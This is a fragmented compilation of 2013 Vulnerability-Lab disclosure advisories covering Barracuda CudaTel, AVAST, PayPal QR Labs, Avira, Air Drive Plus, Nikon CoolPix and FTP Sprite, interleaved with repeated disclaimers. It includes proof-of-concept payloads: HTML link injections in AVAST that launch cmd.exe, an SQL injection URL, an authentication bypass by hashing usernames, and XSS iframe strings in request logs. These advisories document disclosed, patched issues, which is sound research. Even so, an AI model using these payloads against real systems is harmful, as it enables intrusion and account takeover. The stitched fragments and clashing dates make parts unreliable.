Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
Solution: = 2013-03-14: Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow] Note: The upgrade is available to all customer of the appliance module and can be done automatic or manually in the customer center of barracuda networks. Risk: = The security risk of the (multiple) client side input validation vulnerabilities in the siplist and list module are estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability
Title: == Barracuda CudaTel 2.6.02.04 - Persistent Web Vulnerability Date: = 2013-06-21 References: === http://vulnerability-lab.com/get_content.php?id=777 BARRACUDA NETWORK SECURITY ID: BNSEC-834 VL-ID: = 777 Common Vulnerability Scoring System: 3.5 Introduction: = Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: = The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: 2012-11-26: Researcher Notification Coordination (Chokri Ben Achour) 2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2013-04-03: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) 2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow] 2012-06-00: Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: === Remote Severity: = Medium Details: The vulnerability laboratory research team discovered a persistent web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. The input validation vulnerability allows remote attackers to inject own malicious persistent script code on application side of the vulnerable module. The vulnerability is located in the `find me` module of the `call forwarding` function when processing to request manipulated parameters via `add listing`. Local low privilege application user accounts can inject persistent script code to exploit higher privilege web application accounts. The remote bug can be exploited by remote attacker with low privileged application user account and low required userinteraction. Successful exploitation of the vulnerabilities result in persistent session hijacking, persistent persistent external redirects to malware or malicious sites, persistent phishing and persistent web context manipulation (vulnerable module). Vulnerable Section(s): [+] Find Me Vulnerable Module(s): [+] Call Forwarding - Add Vulnerable Parameter(s): [+] Calling Sequence - Listing Proof of Concept: = Solution: = The vulnerability can be patched by parsing the listed (output) web context after processing to add. restrict also the input fields and disallow special chars or wrong strings. 2013-05-02: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow] Risk: = The security risk of the persistent input validation vulnerability is estimated as medium. Credits: Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meis...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com
AVAST Universal Core Installer - Multiple Vulnerabilities
) Click Next twice untill you reach the Installation Information Window e) Scroll down and you should be able to see our Injected Payload. f) If you click on ClickME you should get a CMD shell spawned on the local system hence proving the existence of this vulnerability. g If you proceed with the installation and continue, the installation will fail eventually and once again in the Final Install Log you will see the executed payload. Note: All tests were performed on a system running latest version of MicroSoft Windows 7 OS. Solution: = By default, no user should be allowed to inject HTML code in the application. This can be mitigated by performing proper input sanatization of the vulnerable fields. All illegal characters should also be escaped and application source code should be hardened overall. Proper input encoding and format parse in the source code will fix this issue. Risk: = The security risk of these kinds of vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ateeq Khan [at...@evolution-sec.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability
Title: == Paypal Bug Bounty #102 QR Dev Labs - Auth Bypass Vulnerability Date: = 2013-07-05 References: === http://www.vulnerability-lab.com/get_content.php?id=995 PayPal Security UID: ZVf25kC VL-ID: = 995 Common Vulnerability Scoring System: 7.1 Introduction: = Shopping made easy with PayPal QR enabled on your mobile device. You can scan for deals using the QR Code displayed in shops, trains stations, bus-stops banners and purchase items in just a few taps. Make shopping experience easy for your customer. (Copy of the Vendor Homepage: https://qr.paypal-labs.com ) Abstract: = An independent vulnerability laboratory researcher discovered an auth bypass web session vulnerability in the PayPal QR Labs Service Web Application. Report-Timeline: 2012-05-11:Researcher Notification Coordination (Cernica Ionut) 2013-05-14:Vendor Notification (PayPal Inc Security Incident Team - Bug Bounty Program) 2013-06-20:Vendor Fix/Patch (PayPal Inc Developer Team) 2013-07-05:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == PayPal Inc Product: QR Labs Online Service - Web Application 2013 Q2 Exploitation-Technique: === Remote Severity: = High Details: An auth bypass session web vulnerability is detected in the official PayPal QR Labs Service Web Application. The vulnerability allows remote attackers to bypass the web- or system user auth of the affected vulnerable computer system to compromise paypal accounts. The bug is located in the application account login module when processing to load manipulated j_password parameters via GET method. Attackers are able the decrypt and exchange the information in the request live with a session tamper to take-over other accounts. At the end the vulnerability allows remote attackers to enter remotely any paypal qr labs account of the web application. Exploitation of the vulnerability does not require user interaction but a low privileged paypal qr labs application user account. Successful exploitation results in account steal or compromise and stable user session manipulation with different effects. Vulnerable Service(s): [+] PayPal Inc – qr.paypal-labs.com Vulnerable Module(s): [+] Account - Login Vulnerable Parameter(s): [+] j_password Affected Module(s): [+] Account System Proof of Concept: = The vulnerability can be exploited by remote attackers with low privilege paypal qr labs application user account and without user interaction. For demonstration or reproduce ... Note: After some security checks to authenticate in the qr.paypal-labs.com web application, the last request for being authenticate in this web application it is not secure implemented. Afected Link: https://qr.paypal-labs.com/j_security_check?j_username=loger...@gmail.comj_password=96301aa9f02b5d12278b0e902dc5434ed9477d19 Note: If we look at the request wich is a GET method request we will soon see ... If we encrypt the j_username parameter value as SHA1 ... The result will be the value of the j_password parameter Note: PoC Video The username loger...@gmail.com is encrypted in SHA1 it is equals with 96301aa9f02b5d12278b0e902dc5434ed9477d19 In the demonstration above it seems that the password of the username is encrypted in SHA1 ;) Solution: = 2013-06-20:Vendor Fix/Patch (PayPal Inc Developer Team) Risk: = The security risk of the auth bypass web session vulnerability is estimated as high(+). Credits: Independent Security Researcher – Cernica Ionut Cosmin (ionut.cern...@whit3hat.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com
AVAST Antivirus v8.0.1489 - Multiple Core Vulnerabilities
to the `Offline Registration` section and click on ``Enter the License Key`` d) Enter the following payload h1Vulnerable/h1 and click OK e) You should now see the entered string `Vulnerable` in Heading 1 format proving the existence of this vulnerability. Proof of Concept #2 Local Image File Include For reproducing the Local File include through img tag bug successfully, please follow the below mentioned steps: a) Right Click on Avast Tray Icon and click on ``Registration Information`` b) Scroll down to the `Offline Registration` section and click on ``Enter the License Key`` c) Enter the following payload img src=``file:///YOURFILE``/img and click OK d) You should now see the local image file loaded successfully from your system proving the existence of this vulnerability. Note: For POC #2 I copied a file called logo.png to my C:/ folder and used the following payload to produce the bug img src=``file:///C:/logo.png``/img Proof of Concept #3 Command Shell on Local System (cmd.exe) For reproducing the bug, please follow these below mentioned steps: a) Right Click on Avast Tray Icon and click on ``Registration Information`` b) Scroll down to the `Offline Registration` section and click on ``Enter the License Key`` c) Enter the following payload a href=``cmd`` and click OK d) You should now see the cmd.exe file loaded successfully from your system proving the existence of this vulnerability. e) You can also use the payloads mentioned under next section for some interesting results: Interesting Payloads: a href=``test.com`` a href=``explorer.exe`` a href= a href=``shell:System`` a href=``calc`` a href=``mspaint.exe`` a href=``notepad.exe`` Please note: All tests were performed on a system running latest version of MicroSoft Windows 7 OS. POC Technical Description Here, we used the common HTML tags as our payload. The fact that user injected HTML code is being executed succesfully raises concerns for this core applications security. Then, the fact that using just the a href tag, we can easily bypass AVAST Sandbox and gain local system shell with priviledges of the user that installed the application initially which in most cases will be administrator is very critical. I believe this bug can be further escalated to gain more interested results. I also wanted to test the License file for input validation but I havent been able to perform that test yet due to not having access to a proper license file. I intend to test that feature because i believe it might also be vulnerable. Solution: = By default, no user should be allowed to inject HTML code in the application. This can be mitigated by performing proper input sanatization of the vulnerable fields. All illegal characters should also be escaped and application source code should be hardened overall. Proper input sanatization in the source code will fix this issue. Risk: = The security risk of the detected software vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] - Ateeq Khan [at...@vulnerability-lab.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com- www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
Avira Analysis Web Service - SQL Injection Vulnerability
Title: == Avira Analysis Web Service - SQL Injection Vulnerability Date: = 2013-07-08 References: === http://www.vulnerability-lab.com/get_content.php?id=997 VL-ID: = 997 Common Vulnerability Scoring System: 8.5 Abstract: = The Vulnerability Laboratory Core Research Team discovered a critical SQL Injection vulnerability in the Avira Analysis online service application. Report-Timeline: 2013-05-25:Vendor Notification 2013-05-26:Vendor Response/Feedback 2013-06-31:Vendor Fix/Patch 2013-07-08:Public Disclosure Status: Published Affected Products: == Avira Product: Analysis - Web Application Online Service 2013 Q2 Exploitation-Technique: === Remote Severity: = Critical Details: A remote SQL Injection web vulnerability is detected in #1616; the official Avira Analysis online service application. The vulnerability allows remote attackers to inject own sql commands to compromise the affected application dbms. The SQL Injection vulnerability is located in the `overview` file when processing to request manipulated `uniqueid` parameter. By manipulation of the `uniqueid` parameter the attackers can inject own sql commands to compromise the webserver application dbms. When processing to bypass the filter validation by trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, attackers will be redirected to another page, but when the attacker is processing to request with a back-slash the context will be executed and new mysql errors will become visible for exploitation. The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. Successful exploitation of the sql injection vulnerability results in web application and online service dbms compromise. Vulnerable Module(s): [+] en Vulnerable File(s): [+] overview Vulnerable Module(s): [+] uniqueid Proof of Concept: = The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... Vulnerable Service Domain: analysis.avira.com Vulnerable Module: en Vulnerable File:overview Vulnerable Parameter: uniqueid Note: When trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, you will be redirected to another page, but when processing to load with a back-slash new mysql errors will become visible for exploitation. POC: https://analysis.avira.com/en/overview?start=0uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!] PoC Video: http://www.youtube.com/watch?v=Odko5PTKA-Q Reference(s): https://analysis.avira.com/ Solution: = The vulnerability can be patched by a restriction and secure parse of the uniqueid parameter request. Risk: = The security risk of the remote sql injection web vulnerability is estimated as critical. Credits: Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] (ebra...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
.png.gif.php.js.html/a/td td27,27KB/tdtd align=center2013-07-08 23:07:52/tdtd align=centera onclick=javascript:delfile(1337.png.gif.php.js.html); class=transparent_buttonDelete/a/td/tr 1.3 trtdimg src=Air%20Drive%20-%20Files_files/file.png height=20px width=20px/tdtda target=_blank href=http://192.168.2.104:8000/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png[PERSISTENT INJECTED SCRIPT CODE!]1337.png/a/tdtd27,27KB/tdtd align=center 2013-07-08 23:07:52/tdtd align=centera onclick=javascript:delfile([PERSISTENT INJECTED SCRIPT CODE!]1337.png); class=transparent_buttonDelete/a/td/tr --- Session Request Log --- Status: 302[Found] POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[83] Mime Type[text/html] Request Headers: Host[localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://localhost:8000/index_files.html] Connection[keep-alive] Post Data: POST_DATA[-228191371227676 Content-Disposition: form-data; name=uploadfile; filename=;/private/var/mobile/Applications/1337.png Reference(s): http://localhost:8000/AirDriveAction_file_add Risk: = The security risk of the arbitrary file upload vulnerability and the multiple extensions issue are estimated as high(+). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue
Title: == Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue Date: = 2013-07-16 References: === http://www.vulnerability-lab.com/get_content.php?id=1014 VL-ID: = 1014 Common Vulnerability Scoring System: 3.5 Introduction: = Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 25 is clever with images—so you don’t have to be. Simple controls and smart automatic technology deliver steady images and ensure you capture portraits with smiling faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens. A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any time of day or night and you can switch to filming the action at the touch of a button, or set the camera to Easy Auto mode and capture photos without worrying about a thing. (Copy of the Vendor Homepage: http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27 ) Abstract: = The Vulnerability Laboratory Research Team discovered a information disclosure issue in the Nikon CoolPix Digital Camera L25 with Firmware 1.0. Report-Timeline: 2013-07-16:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Nikon Product: COOLPIX L25 L27 L28 Exploitation-Technique: === Hardware Severity: = Medium Details: An information disclosure issue is detected in the official Nikons Camera L Series 25, 28 maybe others. The information disclosure bug allows remote attackers to access sensitive information of other people, websites, servers or companies. The privacy issue is located in the menu system module when processing to save a start bild (start picture) when processing to boot the camera system. The camera allows to save a start bild (start picture) and does not remove it when processing to perform a format or firmware reset. People can access the device to watch in the short review of the start bild (start picture) the earlier deleted pictures. The device does not recognize it and stored the pictures without the possibility to delete. In a scenario on eBay we bought from a private seller a nikon camera. He uses the camera about 2 years for his holiday trips and conferences. He recognized in a mail the camera got a format and firmware reset. When the camera arrived at our location we was watching the into short review of the start bild (start picture) and saw several images of the owner. Proof of Concept: = The information disclosure issue can be reproduced by local attackers with physical camera device access. Steps to reproduce ... 1. Start the Nikon L series camera 2. Go in the camera screen mode and take a nice picture 3. Go to System Start Bild 4. Choose your own picture and save it as start picture 5. Now shutdown the camera the regular way and start it again after some secounds 6. The image of us will be visible when the system boots 7. When go to the Menu go to System and format the device 8. Go to Menu again and switch to System 9. After the format we now reset the device 10. Shutdown the Nikon Camera and take out the sd card of course 11. Restart it and go to the menu, open the start bild (start picture) module 12. Now the image of us is visible even but we did a full hardware reset or format 13. Information Disclosure issue in Nikon L Series successful reproduced! Note: When the image is saved in the camera as start picture, no format no firmware reset can remove it anymore. Solution: = To fix the vulnerability remove with the firmware reset or format all pictures from the review menu. Risk: = The security risk of the information disclosure issue is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability
FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability
Session Log --- Status: 200[OK] POST http://192.168.2.104:41495/?type=createdirguid=EFB7891B-84ED-4C48-A404-95960BBB95D0 Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[506] Mime Type[text/plain] Request Headers: Host[192.168.2.104:41495] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html, */*; q=0.01] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0type= childdate=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:06: 26%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200] Content-Length[87] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Data: item0[%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C] Response Headers: Accept-Ranges[bytes] Content-Length[506] Content-Type[text/plain] Date[Thu, 11 Jul 2013 18:14:33 GMT] 20:08:50.658[40ms][total 40ms] Status: 404[Not Found] GET http://192.168.2.104:41495/%3C/a Load Flags[LOAD_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:41495] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0type=childdate=Thu%20Jul%2011%202013%2020:05: 48%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200type=childdate=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[0] Date[Thu, 11 Jul 2013 18:14:34 GMT] Solution: = To fix the vulnerability parse the add folder name input field and restrict it but also cleanup the affected listing module with the output. Risk: = The security risk of the persistent input validation web vulnerability is estimated as high(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability
Title: == Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability Date: = 2013-07-15 References: === http://www.vulnerability-lab.com/get_content.php?id=776 BARRACUDA NETWORK SECURITY ID: BNSEC-807 VL-ID: = 776 Common Vulnerability Scoring System: 2.1 Introduction: = Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: = The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: 2012-11-26: Researcher Notification Coordination 2012-11-27: Vendor Notification 2012-12-01: Vendor Response/Feedback 2013-04-03: Vendor Fix/Patch 2012-07-15: Public Disclosure Status: Published Affected Products: == 